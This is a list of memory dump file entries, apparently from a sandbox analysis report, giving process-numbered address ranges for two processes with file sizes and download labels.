memory/2856-1424-0x00007FFBDB310000-0x00007FFBDB32A000-memory.dmp

Filesize
104KB

Download
memory/2856-1419-0x00007FFBD98A0000-0x00007FFBD98D0000-memory.dmp

Filesize
192KB

Download
memory/2856-1416-0x00007FFBDA120000-0x00007FFBDA142000-memory.dmp

Filesize
136KB

Download
memory/2856-1430-0x00007FFBD8230000-0x00007FFBD8241000-memory.dmp

Filesize
68KB

Download
memory/2856-1429-0x00007FFBDBBB0000-0x00007FFBDBBF4000-memory.dmp

Filesize
272KB

Download
memory/2856-1442-0x00007FFBC8F80000-0x00007FFBC8F8C000-memory.dmp

Filesize
48KB

Download
memory/2856-1441-0x00007FFBC8F90000-0x00007FFBC8F9B000-memory.dmp

Filesize
44KB

Download
memory/2856-1440-0x00007FFBC8FA0000-0x00007FFBC8FAC000-memory.dmp

Filesize
48KB

Download
memory/2856-1439-0x00007FFBC8FB0000-0x00007FFBC8FBB000-memory.dmp

Filesize
44KB

Download
memory/2856-1438-0x00007FFBD7B60000-0x00007FFBD7B6C000-memory.dmp

Filesize
48KB

Download
memory/2856-1437-0x00007FFBD82C0000-0x00007FFBD82CB000-memory.dmp

Filesize
44KB

Download
memory/2856-1436-0x00007FFBD9CC0000-0x00007FFBD9CCB000-memory.dmp

Filesize
44KB

Download
memory/2856-1435-0x00007FFBC8FC0000-0x00007FFBC8FF8000-memory.dmp

Filesize
224KB

Download
memory/2856-1434-0x00007FFBC9000000-0x00007FFBC901C000-memory.dmp

Filesize
112KB

Download
memory/2856-1433-0x00007FFBC9020000-0x00007FFBC9191000-memory.dmp

Filesize
1.4MB

Download
memory/2856-1432-0x00007FFBC91A0000-0x00007FFBC91BF000-memory.dmp

Filesize
124KB

Download
memory/2856-1431-0x00007FFBC9930000-0x00007FFBCBA23000-memory.dmp

Filesize
32.9MB

Download
memory/2856-1297-0x00007FFBDF370000-0x00007FFBDF394000-memory.dmp

Filesize
144KB

Download
memory/2856-1566-0x00007FFBDF370000-0x00007FFBDF394000-memory.dmp

Filesize
144KB

Download
memory/2856-1577-0x00007FFBDBC60000-0x00007FFBDBD18000-memory.dmp

Filesize
736KB

Download
memory/2856-1576-0x00007FFBDF0D0000-0x00007FFBDF0FE000-memory.dmp

Filesize
184KB

Download
memory/2856-1565-0x00007FFBCC960000-0x00007FFBCCDCE000-memory.dmp

Filesize
4.4MB

Download
memory/2856-1575-0x00007FFBCC5E0000-0x00007FFBCC955000-memory.dmp

Filesize
3.5MB

Download
memory/2856-1564-0x00007FF6A9260000-0x00007FF6A92CA000-memory.dmp

Filesize
424KB

Download
memory/2856-1596-0x00007FFBCC960000-0x00007FFBCCDCE000-memory.dmp

Filesize
4.4MB

Download
memory/4176-0-0x00007FF6A9260000-0x00007FF6A92CA000-memory.dmp

Filesize
424KB

Download
memory/4176-1355-0x00007FF6A9260000-0x00007FF6A92CA000-memory.dmp

Filesize
424KB

Download